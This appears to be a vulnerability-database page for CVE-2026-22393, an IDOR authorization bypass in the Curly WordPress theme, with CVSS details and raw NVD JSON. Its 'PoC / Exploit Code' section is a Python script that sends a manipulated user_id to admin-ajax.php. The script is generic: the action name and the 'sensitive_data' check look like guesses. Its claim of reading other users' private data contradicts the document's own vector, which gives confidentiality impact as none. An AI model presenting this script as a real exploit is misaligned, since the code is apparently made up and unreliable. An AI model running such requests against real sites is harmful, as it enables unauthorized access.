Security Vulnerability Report
中文
CVE-2026-22393 CVSS 5.4 MEDIUM

CVE-2026-22393

Published: 2026-01-22 17:16:33
Last Modified: 2026-04-28 19:36:34

Description

Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes Curly curly allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Curly: from n/a through <= 3.3.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Mikado-Themes Curly <= 3.3 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2026-22393 PoC - IDOR in Curly WordPress Theme # Target: WordPress site with Curly theme <= 3.3 TARGET_URL = "http://target-site.com" def exploit_idor(): """ This PoC demonstrates the IDOR vulnerability in Curly theme. The attacker can manipulate object references to access unauthorized resources. """ # Step 1: Identify vulnerable endpoint # The theme allows direct object reference without proper authorization checks # Example: Accessing another user's private data by manipulating user_id parameter payload = { 'user_id': '2', # Attacker manipulates this to access other user's data 'action': 'get_user_data' } # Step 2: Send malicious request endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php" headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Content-Type': 'application/x-www-form-urlencoded' } # This request bypasses authorization due to missing access control check response = requests.post(endpoint, data=payload, headers=headers) print(f"Status Code: {response.status_code}") print(f"Response: {response.text}") # Step 3: Verify unauthorized access if response.status_code == 200 and 'sensitive_data' in response.text: print("[+] IDOR vulnerability confirmed - unauthorized access successful") return True else: print("[-] Attack failed or target not vulnerable") return False if __name__ == "__main__": exploit_idor()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22393", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:32.837", "lastModified": "2026-04-28T19:36:34.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes Curly curly allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Curly: from n/a through <= 3.3."}, {"lang": "es", "value": "Vulnerabilidad de elusión de autorización a través de clave controlada por el usuario en Mikado-Themes Curly curly permite explotar niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Curly: desde n/a hasta &lt;= 3.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/curly/vulnerability/wordpress-curly-theme-3-3-insecure-direct-object-references-idor-vulnerability?_s_id=cve", "source": "[email protected]"}]}}